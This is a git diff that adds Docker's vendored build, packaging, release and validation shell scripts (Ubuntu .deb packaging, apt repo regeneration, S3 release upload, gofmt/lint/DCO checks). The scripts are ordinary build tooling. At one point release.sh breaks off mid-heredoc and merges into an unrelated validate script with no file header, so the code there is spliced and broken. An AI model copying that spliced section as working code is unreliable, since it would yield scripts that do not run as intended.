1.5.0~dev~git20150128.112847.17e840a + +PACKAGE_ARCHITECTURE="$(dpkg-architecture -qDEB_HOST_ARCH)" +PACKAGE_URL="https://www.docker.com/" +PACKAGE_MAINTAINER="support@docker.com" +PACKAGE_DESCRIPTION="Linux container runtime +Docker complements LXC with a high-level API which operates at the process +level. It runs unix processes with strong guarantees of isolation and +repeatability across servers. +Docker is a great building block for automating distributed systems: +large-scale web deployments, database clusters, continuous deployment systems, +private PaaS, service-oriented architectures, etc." +PACKAGE_LICENSE="Apache-2.0" + +# Build docker as an ubuntu package using FPM and REPREPRO (sue me). +# bundle_binary must be called first. +bundle_ubuntu() { + DIR="$ABS_DEST/build" + + # Include our udev rules + mkdir -p "$DIR/etc/udev/rules.d" + cp contrib/udev/80-docker.rules "$DIR/etc/udev/rules.d/" + + # Include our init scripts + mkdir -p "$DIR/etc/init" + cp contrib/init/upstart/docker.conf "$DIR/etc/init/" + mkdir -p "$DIR/etc/init.d" + cp contrib/init/sysvinit-debian/docker "$DIR/etc/init.d/" + mkdir -p "$DIR/etc/default" + cp contrib/init/sysvinit-debian/docker.default "$DIR/etc/default/docker" + mkdir -p "$DIR/lib/systemd/system" + cp contrib/init/systemd/docker.{service,socket} "$DIR/lib/systemd/system/" + + # Include contributed completions + mkdir -p "$DIR/etc/bash_completion.d" + cp contrib/completion/bash/docker "$DIR/etc/bash_completion.d/" + mkdir -p "$DIR/usr/share/zsh/vendor-completions" + cp contrib/completion/zsh/_docker "$DIR/usr/share/zsh/vendor-completions/" + mkdir -p "$DIR/etc/fish/completions" + cp contrib/completion/fish/docker.fish "$DIR/etc/fish/completions/" + + # Include man pages + make manpages + manRoot="$DIR/usr/share/man" + mkdir -p "$manRoot" + for manDir in man/man?; do + manBase="$(basename "$manDir")" # "man1" + for manFile in "$manDir"/*; do + manName="$(basename "$manFile")" # "docker-build.1" + mkdir -p "$manRoot/$manBase" 
+ gzip -c "$manFile" > "$manRoot/$manBase/$manName.gz" + done + done + + # Copy the binary + # This will fail if the binary bundle hasn't been built + mkdir -p "$DIR/usr/bin" + cp "$DEST/../binary/docker-$VERSION" "$DIR/usr/bin/docker" + + # Generate postinst/prerm/postrm scripts + cat > "$DEST/postinst" <<'EOF' +#!/bin/sh +set -e +set -u + +if [ "$1" = 'configure' ] && [ -z "$2" ]; then + if ! getent group docker > /dev/null; then + groupadd --system docker + fi +fi + +if ! { [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | grep -q upstart; }; then + # we only need to do this if upstart isn't in charge + update-rc.d docker defaults > /dev/null || true +fi +if [ -n "$2" ]; then + _dh_action=restart +else + _dh_action=start +fi +service docker $_dh_action 2>/dev/null || true + +#DEBHELPER# +EOF + cat > "$DEST/prerm" <<'EOF' +#!/bin/sh +set -e +set -u + +service docker stop 2>/dev/null || true + +#DEBHELPER# +EOF + cat > "$DEST/postrm" <<'EOF' +#!/bin/sh +set -e +set -u + +if [ "$1" = "purge" ] ; then + update-rc.d docker remove > /dev/null || true +fi + +# In case this system is running systemd, we make systemd reload the unit files +# to pick up changes. 
+if [ -d /run/systemd/system ] ; then + systemctl --system daemon-reload > /dev/null || true +fi + +#DEBHELPER# +EOF + # TODO swaths of these were borrowed from debhelper's auto-inserted stuff, because we're still using fpm - we need to use debhelper instead, and somehow reconcile Ubuntu that way + chmod +x "$DEST/postinst" "$DEST/prerm" "$DEST/postrm" + + ( + # switch directories so we create *.deb in the right folder + cd "$DEST" + + # create lxc-docker-VERSION package + fpm -s dir -C "$DIR" \ + --name "lxc-docker-$VERSION" --version "$PKGVERSION" \ + --after-install "$ABS_DEST/postinst" \ + --before-remove "$ABS_DEST/prerm" \ + --after-remove "$ABS_DEST/postrm" \ + --architecture "$PACKAGE_ARCHITECTURE" \ + --prefix / \ + --depends iptables \ + --deb-recommends aufs-tools \ + --deb-recommends ca-certificates \ + --deb-recommends git \ + --deb-recommends xz-utils \ + --deb-recommends 'cgroupfs-mount | cgroup-lite' \ + --deb-suggests apparmor \ + --description "$PACKAGE_DESCRIPTION" \ + --maintainer "$PACKAGE_MAINTAINER" \ + --conflicts docker \ + --conflicts docker.io \ + --conflicts lxc-docker-virtual-package \ + --provides lxc-docker \ + --provides lxc-docker-virtual-package \ + --replaces lxc-docker \ + --replaces lxc-docker-virtual-package \ + --url "$PACKAGE_URL" \ + --license "$PACKAGE_LICENSE" \ + --config-files /etc/udev/rules.d/80-docker.rules \ + --config-files /etc/init/docker.conf \ + --config-files /etc/init.d/docker \ + --config-files /etc/default/docker \ + --deb-compression gz \ + -t deb . 
+ # TODO replace "Suggests: cgroup-lite" with "Recommends: cgroupfs-mount | cgroup-lite" once cgroupfs-mount is available + + # create empty lxc-docker wrapper package + fpm -s empty \ + --name lxc-docker --version "$PKGVERSION" \ + --architecture "$PACKAGE_ARCHITECTURE" \ + --depends lxc-docker-$VERSION \ + --description "$PACKAGE_DESCRIPTION" \ + --maintainer "$PACKAGE_MAINTAINER" \ + --url "$PACKAGE_URL" \ + --license "$PACKAGE_LICENSE" \ + --deb-compression gz \ + -t deb + ) + + # clean up after ourselves so we have a clean output directory + rm "$DEST/postinst" "$DEST/prerm" "$DEST/postrm" + rm -r "$DIR" +} + +bundle_ubuntu diff --git a/vendor/github.com/docker/docker/hack/make/update-apt-repo b/vendor/github.com/docker/docker/hack/make/update-apt-repo new file mode 100755 index 0000000000..7354a2ecff --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/update-apt-repo @@ -0,0 +1,70 @@ +#!/bin/bash +set -e + +# This script updates the apt repo in $DOCKER_RELEASE_DIR/apt/repo. +# This script is a "fix all" for any sort of problems that might have occurred with +# the Release or Package files in the repo. +# It should only be used in the rare case of extreme emergencies to regenerate +# Release and Package files for the apt repo. +# +# NOTE: Always be sure to re-sign the repo with hack/make/sign-repos after running +# this script. 
+ +: ${DOCKER_RELEASE_DIR:=$DEST} +APTDIR=$DOCKER_RELEASE_DIR/apt/repo + +# supported arches/sections +arches=( amd64 i386 ) + +# Preserve existing components but don't add any non-existing ones +for component in main testing experimental ; do + if ls "$APTDIR/dists/*/$component" >/dev/null 2>&1 ; then + components+=( $component ) + fi +done + +dists=( $(find "${APTDIR}/dists" -maxdepth 1 -mindepth 1 -type d) ) + +# override component if it is set +if [ "$COMPONENT" ]; then + components=( $COMPONENT ) +fi + +# release the debs +for version in "${dists[@]}"; do + for component in "${components[@]}"; do + codename="${version//debootstrap-}" + + # update the filelist for this codename/component + find "$APTDIR/pool/$component" \ + -name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist" + done +done + +# run the apt-ftparchive commands so we can have pinning +apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf" + +for dist in "${dists[@]}"; do + version=$(basename "$dist") + for component in "${components[@]}"; do + codename="${version//debootstrap-}" + + apt-ftparchive \ + -o "APT::FTPArchive::Release::Codename=$codename" \ + -o "APT::FTPArchive::Release::Suite=$codename" \ + -c "$APTDIR/conf/docker-engine-release.conf" \ + release \ + "$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release" + + for arch in "${arches[@]}"; do + apt-ftparchive \ + -o "APT::FTPArchive::Release::Codename=$codename" \ + -o "APT::FTPArchive::Release::Suite=$codename" \ + -o "APT::FTPArchive::Release::Component=$component" \ + -o "APT::FTPArchive::Release::Architecture=$arch" \ + -c "$APTDIR/conf/docker-engine-release.conf" \ + release \ + "$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release" + done + done +done diff --git a/vendor/github.com/docker/docker/hack/make/win b/vendor/github.com/docker/docker/hack/make/win new file mode 100644 index 0000000000..f9f4111276 --- /dev/null +++ 
b/vendor/github.com/docker/docker/hack/make/win @@ -0,0 +1,20 @@ +#!/bin/bash +set -e + +# explicit list of os/arch combos that support being a daemon +declare -A daemonSupporting +daemonSupporting=( + [linux/amd64]=1 + [windows/amd64]=1 +) +platform="windows/amd64" +export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION +mkdir -p "$DEST" +ABS_DEST="$(cd "$DEST" && pwd -P)" +export GOOS=${platform%/*} +export GOARCH=${platform##*/} +if [ -z "${daemonSupporting[$platform]}" ]; then + export LDFLAGS_STATIC_DOCKER="" # we just need a simple client for these platforms + export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) # remove the "daemon" build tag from platforms that aren't supported +fi +source "${MAKEDIR}/binary" diff --git a/vendor/github.com/docker/docker/hack/release.sh b/vendor/github.com/docker/docker/hack/release.sh new file mode 100755 index 0000000000..4b020537ea --- /dev/null +++ b/vendor/github.com/docker/docker/hack/release.sh @@ -0,0 +1,325 @@ +#!/usr/bin/env bash +set -e + +# This script looks for bundles built by make.sh, and releases them on a +# public S3 bucket. +# +# Bundles should be available for the VERSION string passed as argument. +# +# The correct way to call this script is inside a container built by the +# official Dockerfile at the root of the Docker source code. The Dockerfile, +# make.sh and release.sh should all be from the same source code revision. + +set -o pipefail + +# Print a usage message and exit. +usage() { + cat >&2 <<'EOF' +To run, I need: +- to be in a container generated by the Dockerfile at the top of the Docker + repository; +- to be provided with the location of an S3 bucket and path, in + environment variables AWS_S3_BUCKET and AWS_S3_BUCKET_PATH (default: ''); +- to be provided with AWS credentials for this S3 bucket, in environment + variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY; +- a generous amount of good will and nice manners. 
+The canonical way to run me is to run the image produced by the Dockerfile: e.g.:" + +docker run -e AWS_S3_BUCKET=test.docker.com \ + -e AWS_ACCESS_KEY_ID \ + -e AWS_SECRET_ACCESS_KEY \ + -e AWS_DEFAULT_REGION \ + -it --privileged \ + docker ./hack/release.sh +EOF + exit 1 +} + +[ "$AWS_S3_BUCKET" ] || usage +[ "$AWS_ACCESS_KEY_ID" ] || usage +[ "$AWS_SECRET_ACCESS_KEY" ] || usage +[ -d /go/src/github.com/docker/docker ] || usage +cd /go/src/github.com/docker/docker +[ -x hack/make.sh ] || usage + +export AWS_DEFAULT_REGION +: ${AWS_DEFAULT_REGION:=us-west-1} + +AWS_CLI=${AWS_CLI:-'aws'} + +RELEASE_BUNDLES=( + binary + cross + tgz +) + +if [ "$1" != '--release-regardless-of-test-failure' ]; then + RELEASE_BUNDLES=( + test-unit + "${RELEASE_BUNDLES[@]}" + test-integration-cli + ) +fi + +VERSION=$(< VERSION) +BUCKET=$AWS_S3_BUCKET +BUCKET_PATH=$BUCKET +[[ -n "$AWS_S3_BUCKET_PATH" ]] && BUCKET_PATH+=/$AWS_S3_BUCKET_PATH + +if command -v git &> /dev/null && git rev-parse &> /dev/null; then + if [ -n "$(git status --porcelain --untracked-files=no)" ]; then + echo "You cannot run the release script on a repo with uncommitted changes" + usage + fi +fi + +# These are the 2 keys we've used to sign the deb's +# release (get.docker.com) +# GPG_KEY="36A1D7869245C8950F966E92D8576A8BA88D21E9" +# test (test.docker.com) +# GPG_KEY="740B314AE3941731B942C66ADF4FD13717AAD7D6" + +setup_s3() { + echo "Setting up S3" + # Try creating the bucket. Ignore errors (it might already exist). + $AWS_CLI s3 mb "s3://$BUCKET" 2>/dev/null || true + # Check access to the bucket. + $AWS_CLI s3 ls "s3://$BUCKET" >/dev/null + # Make the bucket accessible through website endpoints. + $AWS_CLI s3 website --index-document index --error-document error "s3://$BUCKET" +} + +# write_to_s3 uploads the contents of standard input to the specified S3 url. 
+write_to_s3() { + DEST=$1 + F=`mktemp` + cat > "$F" + $AWS_CLI s3 cp --acl public-read --content-type 'text/plain' "$F" "$DEST" + rm -f "$F" +} + +s3_url() { + case "$BUCKET" in + get.docker.com|test.docker.com|experimental.docker.com) + echo "https://$BUCKET_PATH" + ;; + *) + BASE_URL="http://${BUCKET}.s3-website-${AWS_DEFAULT_REGION}.amazonaws.com" + if [[ -n "$AWS_S3_BUCKET_PATH" ]] ; then + echo "$BASE_URL/$AWS_S3_BUCKET_PATH" + else + echo "$BASE_URL" + fi + ;; + esac +} + +build_all() { + echo "Building release" + if ! ./hack/make.sh "${RELEASE_BUNDLES[@]}"; then + echo >&2 + echo >&2 'The build or tests appear to have failed.' + echo >&2 + echo >&2 'You, as the release maintainer, now have a couple options:' + echo >&2 '- delay release and fix issues' + echo >&2 '- delay release and fix issues' + echo >&2 '- did we mention how important this is? issues need fixing :)' + echo >&2 + echo >&2 'As a final LAST RESORT, you (because only you, the release maintainer,' + echo >&2 ' really knows all the hairy problems at hand with the current release' + echo >&2 ' issues) may bypass this checking by running this script again with the' + echo >&2 ' single argument of "--release-regardless-of-test-failure", which will skip' + echo >&2 ' running the test suite, and will only build the binaries and packages. Please' + echo >&2 ' avoid using this if at all possible.' + echo >&2 + echo >&2 'Regardless, we cannot stress enough the scarcity with which this bypass' + echo >&2 ' should be used. If there are release issues, we should always err on the' + echo >&2 ' side of caution.' 
+ echo >&2 + exit 1 + fi +} + +upload_release_build() { + src="$1" + dst="$2" + latest="$3" + + echo + echo "Uploading $src" + echo " to $dst" + echo + $AWS_CLI s3 cp --follow-symlinks --acl public-read "$src" "$dst" + if [ "$latest" ]; then + echo + echo "Copying to $latest" + echo + $AWS_CLI s3 cp --acl public-read "$dst" "$latest" + fi + + # get hash files too (see hash_files() in hack/make.sh) + for hashAlgo in md5 sha256; do + if [ -e "$src.$hashAlgo" ]; then + echo + echo "Uploading $src.$hashAlgo" + echo " to $dst.$hashAlgo" + echo + $AWS_CLI s3 cp --follow-symlinks --acl public-read --content-type='text/plain' "$src.$hashAlgo" "$dst.$hashAlgo" + if [ "$latest" ]; then + echo + echo "Copying to $latest.$hashAlgo" + echo + $AWS_CLI s3 cp --acl public-read "$dst.$hashAlgo" "$latest.$hashAlgo" + fi + fi + done +} + +release_build() { + echo "Releasing binaries" + GOOS=$1 + GOARCH=$2 + + binDir=bundles/$VERSION/cross/$GOOS/$GOARCH + tgzDir=bundles/$VERSION/tgz/$GOOS/$GOARCH + binary=docker-$VERSION + zipExt=".tgz" + binaryExt="" + tgz=$binary$zipExt + + latestBase= + if [ -z "$NOLATEST" ]; then + latestBase=docker-latest + fi + + # we need to map our GOOS and GOARCH to uname values + # see https://en.wikipedia.org/wiki/Uname + # ie, GOOS=linux -> "uname -s"=Linux + + s3Os=$GOOS + case "$s3Os" in + darwin) + s3Os=Darwin + ;; + freebsd) + s3Os=FreeBSD + ;; + linux) + s3Os=Linux + ;; + solaris) + echo skipping solaris release + return 0 + ;; + windows) + # this is windows use the .zip and .exe extensions for the files. 
+ s3Os=Windows + zipExt=".zip" + binaryExt=".exe" + tgz=$binary$zipExt + binary+=$binaryExt + ;; + *) + echo >&2 "error: can't convert $s3Os to an appropriate value for 'uname -s'" + exit 1 + ;; + esac + + s3Arch=$GOARCH + case "$s3Arch" in + amd64) + s3Arch=x86_64 + ;; + 386) + s3Arch=i386 + ;; + arm) + s3Arch=armel + # someday, we might potentially support multiple GOARM values, in which case we might get armhf here too + ;; + *) + echo >&2 "error: can't convert $s3Arch to an appropriate value for 'uname -m'" + exit 1 + ;; + esac + + s3Dir="s3://$BUCKET_PATH/builds/$s3Os/$s3Arch" + # latest= + latestTgz= + if [ "$latestBase" ]; then + # commented out since we aren't uploading binaries right now. + # latest="$s3Dir/$latestBase$binaryExt" + # we don't include the $binaryExt because we don't want docker.exe.zip + latestTgz="$s3Dir/$latestBase$zipExt" + fi + + if [ ! -f "$tgzDir/$tgz" ]; then + echo >&2 "error: can't find $tgzDir/$tgz - was it packaged properly?" + exit 1 + fi + # disable binary uploads for now. 
Only providing tgz downloads + # upload_release_build "$binDir/$binary" "$s3Dir/$binary" "$latest" + upload_release_build "$tgzDir/$tgz" "$s3Dir/$tgz" "$latestTgz" +} + +# Upload binaries and tgz files to S3 +release_binaries() { + [ "$(find bundles/$VERSION -path "bundles/$VERSION/cross/*/*/docker-$VERSION")" != "" ] || { + echo >&2 './hack/make.sh must be run before release_binaries' + exit 1 + } + + for d in bundles/$VERSION/cross/*/*; do + GOARCH="$(basename "$d")" + GOOS="$(basename "$(dirname "$d")")" + release_build "$GOOS" "$GOARCH" + done + + # TODO create redirect from builds/*/i686 to builds/*/i386 + + cat < /dev/null + # Let see if the working directory is clean + diffs="$(git status --porcelain -- cli/compose/schema 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of `go generate github.com/docker/docker/cli/compose/schema` differs' + echo + echo "$diffs" + echo + echo 'Please run `go generate github.com/docker/docker/cli/compose/schema`' + } >&2 + false + else + echo 'Congratulations! cli/compose/schema/bindata.go is up-to-date.' + fi +else + echo 'No cli/compose/schema/data changes in diff.' 
+fi diff --git a/vendor/github.com/docker/docker/hack/validate/dco b/vendor/github.com/docker/docker/hack/validate/dco new file mode 100755 index 0000000000..754ce8faec --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/dco @@ -0,0 +1,55 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +adds=$(validate_diff --numstat | awk '{ s += $1 } END { print s }') +dels=$(validate_diff --numstat | awk '{ s += $2 } END { print s }') +#notDocs="$(validate_diff --numstat | awk '$3 !~ /^docs\// { print $3 }')" + +: ${adds:=0} +: ${dels:=0} + +# "Username may only contain alphanumeric characters or dashes and cannot begin with a dash" +githubUsernameRegex='[a-zA-Z0-9][a-zA-Z0-9-]+' + +# https://github.com/docker/docker/blob/master/CONTRIBUTING.md#sign-your-work +dcoPrefix='Signed-off-by:' +dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \\(github: ($githubUsernameRegex)\\))?$" + +check_dco() { + grep -qE "$dcoRegex" +} + +if [ $adds -eq 0 -a $dels -eq 0 ]; then + echo '0 adds, 0 deletions; nothing to validate! :)' +else + commits=( $(validate_log --format='format:%H%n') ) + badCommits=() + for commit in "${commits[@]}"; do + if [ -z "$(git log -1 --format='format:' --name-status "$commit")" ]; then + # no content (ie, Merge commit, etc) + continue + fi + if ! git log -1 --format='format:%B' "$commit" | check_dco; then + badCommits+=( "$commit" ) + fi + done + if [ ${#badCommits[@]} -eq 0 ]; then + echo "Congratulations! All commits are properly signed with the DCO!" + else + { + echo "These commits do not have a proper '$dcoPrefix' marker:" + for commit in "${badCommits[@]}"; do + echo " - $commit" + done + echo + echo 'Please amend each commit to include a properly formatted DCO marker.' 
+ echo + echo 'Visit the following URL for information about the Docker DCO:' + echo ' https://github.com/docker/docker/blob/master/CONTRIBUTING.md#sign-your-work' + echo + } >&2 + false + fi +fi diff --git a/vendor/github.com/docker/docker/hack/validate/default b/vendor/github.com/docker/docker/hack/validate/default new file mode 100755 index 0000000000..29b96ca9a3 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/default @@ -0,0 +1,16 @@ +#!/bin/bash +# +# Run default validation, exclude vendor because it's slow + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" + +. $SCRIPTDIR/dco +. $SCRIPTDIR/default-seccomp +. $SCRIPTDIR/gofmt +. $SCRIPTDIR/lint +. $SCRIPTDIR/pkg-imports +. $SCRIPTDIR/swagger +. $SCRIPTDIR/swagger-gen +. $SCRIPTDIR/test-imports +. $SCRIPTDIR/toml +. $SCRIPTDIR/vet diff --git a/vendor/github.com/docker/docker/hack/validate/default-seccomp b/vendor/github.com/docker/docker/hack/validate/default-seccomp new file mode 100755 index 0000000000..8fe8435618 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/default-seccomp @@ -0,0 +1,28 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'profiles/seccomp' || true) ) +unset IFS + +if [ ${#files[@]} -gt 0 ]; then + # We run 'go generate' and see if we have a diff afterwards + go generate ./profiles/seccomp/ >/dev/null + # Let see if the working directory is clean + diffs="$(git status --porcelain -- profiles/seccomp 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of go generate ./profiles/seccomp/ differs' + echo + echo "$diffs" + echo + echo 'Please re-run go generate ./profiles/seccomp/' + echo + } >&2 + false + else + echo 'Congratulations! Seccomp profile generation is done correctly.' 
+ fi +fi diff --git a/vendor/github.com/docker/docker/hack/validate/gofmt b/vendor/github.com/docker/docker/hack/validate/gofmt new file mode 100755 index 0000000000..2040afa09e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/gofmt @@ -0,0 +1,33 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | + grep -v '^vendor/' | + grep -v '^cli/compose/schema/bindata.go' || true) ) +unset IFS + +badFiles=() +for f in "${files[@]}"; do + # we use "git show" here to validate that what's committed is formatted + if [ "$(git show "$VALIDATE_HEAD:$f" | gofmt -s -l)" ]; then + badFiles+=( "$f" ) + fi +done + +if [ ${#badFiles[@]} -eq 0 ]; then + echo 'Congratulations! All Go source files are properly formatted.' +else + { + echo "These files are not properly gofmt'd:" + for f in "${badFiles[@]}"; do + echo " - $f" + done + echo + echo 'Please reformat the above files using "gofmt -s -w" and commit the result.' + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/lint b/vendor/github.com/docker/docker/hack/validate/lint new file mode 100755 index 0000000000..4ac0a33b20 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/lint @@ -0,0 +1,31 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' | grep -v '^cli/compose/schema/bindata.go' || true) ) +unset IFS + +errors=() +for f in "${files[@]}"; do + failedLint=$(golint "$f") + if [ "$failedLint" ]; then + errors+=( "$failedLint" ) + fi +done + +if [ ${#errors[@]} -eq 0 ]; then + echo 'Congratulations! All Go source files have been linted.' 
+else + { + echo "Errors from golint:" + for err in "${errors[@]}"; do + echo "$err" + done + echo + echo 'Please fix the above errors. You can test via "golint" and commit the result.' + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/pkg-imports b/vendor/github.com/docker/docker/hack/validate/pkg-imports new file mode 100755 index 0000000000..9e4ea74da0 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/pkg-imports @@ -0,0 +1,33 @@ +#!/bin/bash +set -e + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'pkg/*.go' || true) ) +unset IFS + +badFiles=() +for f in "${files[@]}"; do + IFS=$'\n' + badImports=( $(go list -e -f '{{ join .Deps "\n" }}' "$f" | sort -u | grep -vE '^github.com/docker/docker/pkg/' | grep -vE '^github.com/docker/docker/vendor' | grep -E '^github.com/docker/docker' || true) ) + unset IFS + + for import in "${badImports[@]}"; do + badFiles+=( "$f imports $import" ) + done +done + +if [ ${#badFiles[@]} -eq 0 ]; then + echo 'Congratulations! "./pkg/..." is safely isolated from internal code.' 
+else + { + echo 'These files import internal code: (either directly or indirectly)' + for f in "${badFiles[@]}"; do + echo " - $f" + done + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/swagger b/vendor/github.com/docker/docker/hack/validate/swagger new file mode 100755 index 0000000000..e754fb8cb9 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/swagger @@ -0,0 +1,13 @@ +#!/bin/bash +set -e +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'api/swagger.yaml' || true) ) +unset IFS + +if [ ${#files[@]} -gt 0 ]; then + yamllint -c ${SCRIPTDIR}/.swagger-yamllint api/swagger.yaml + swagger validate api/swagger.yaml +fi diff --git a/vendor/github.com/docker/docker/hack/validate/swagger-gen b/vendor/github.com/docker/docker/hack/validate/swagger-gen new file mode 100755 index 0000000000..008abc7e0d --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/swagger-gen @@ -0,0 +1,29 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'api/types/' 'api/swagger.yaml' || true) ) +unset IFS + +if [ ${#files[@]} -gt 0 ]; then + ${SCRIPTDIR}/../generate-swagger-api.sh 2> /dev/null + # Let see if the working directory is clean + diffs="$(git status --porcelain -- api/types/ 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of hack/generate-swagger-api.sh differs' + echo + echo "$diffs" + echo + echo 'Please update api/swagger.yaml with any api changes, then ' + echo 'run `hack/generate-swagger-api.sh`.' + } >&2 + false + else + echo 'Congratulations! All api changes are done the right way.' + fi +else + echo 'No api/types/ or api/swagger.yaml changes in diff.' 
+fi diff --git a/vendor/github.com/docker/docker/hack/validate/test-imports b/vendor/github.com/docker/docker/hack/validate/test-imports new file mode 100755 index 0000000000..373caa2f29 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/test-imports @@ -0,0 +1,38 @@ +#!/bin/bash +# Make sure we're not using gos' Testing package any more in integration-cli + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'integration-cli/*.go' || true) ) +unset IFS + +badFiles=() +for f in "${files[@]}"; do + # skip check_test.go since it *does* use the testing package + if [ "$f" = "integration-cli/check_test.go" ]; then + continue + fi + + # we use "git show" here to validate that what's committed doesn't contain golang built-in testing + if git show "$VALIDATE_HEAD:$f" | grep -q testing.T; then + if [ "$(echo $f | grep '_test')" ]; then + # allow testing.T for non- _test files + badFiles+=( "$f" ) + fi + fi +done + +if [ ${#badFiles[@]} -eq 0 ]; then + echo 'Congratulations! No testing.T found.' +else + { + echo "These files use the wrong testing infrastructure:" + for f in "${badFiles[@]}"; do + echo " - $f" + done + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/toml b/vendor/github.com/docker/docker/hack/validate/toml new file mode 100755 index 0000000000..a0cb158dbd --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/toml @@ -0,0 +1,31 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'MAINTAINERS' || true) ) +unset IFS + +badFiles=() +for f in "${files[@]}"; do + # we use "git show" here to validate that what's committed has valid toml syntax + if ! 
git show "$VALIDATE_HEAD:$f" | tomlv /proc/self/fd/0 ; then + badFiles+=( "$f" ) + fi +done + +if [ ${#badFiles[@]} -eq 0 ]; then + echo 'Congratulations! All toml source files changed here have valid syntax.' +else + { + echo "These files are not valid toml:" + for f in "${badFiles[@]}"; do + echo " - $f" + done + echo + echo 'Please reformat the above files as valid toml' + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/vendor b/vendor/github.com/docker/docker/hack/validate/vendor new file mode 100755 index 0000000000..0cb5aabdfa --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/vendor @@ -0,0 +1,30 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'vendor.conf' 'vendor/' || true) ) +unset IFS + +if [ ${#files[@]} -gt 0 ]; then + # We run vndr to and see if we have a diff afterwards + vndr + # Let see if the working directory is clean + diffs="$(git status --porcelain -- vendor 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of vndr differs' + echo + echo "$diffs" + echo + echo 'Please vendor your package with github.com/LK4D4/vndr.' + echo + } >&2 + false + else + echo 'Congratulations! All vendoring changes are done the right way.' + fi +else + echo 'No vendor changes in diff.' 
+fi diff --git a/vendor/github.com/docker/docker/hack/validate/vet b/vendor/github.com/docker/docker/hack/validate/vet new file mode 100755 index 0000000000..64760489ea --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/vet @@ -0,0 +1,32 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' || true) ) +unset IFS + +errors=() +for f in "${files[@]}"; do + failedVet=$(go vet "$f") + if [ "$failedVet" ]; then + errors+=( "$failedVet" ) + fi +done + + +if [ ${#errors[@]} -eq 0 ]; then + echo 'Congratulations! All Go source files have been vetted.' +else + { + echo "Errors from go vet:" + for err in "${errors[@]}"; do + echo " - $err" + done + echo + echo 'Please fix the above errors. You can test via "go vet" and commit the result.' + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/vendor.sh b/vendor/github.com/docker/docker/hack/vendor.sh new file mode 100755 index 0000000000..9a4d038539 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/vendor.sh @@ -0,0 +1,15 @@ 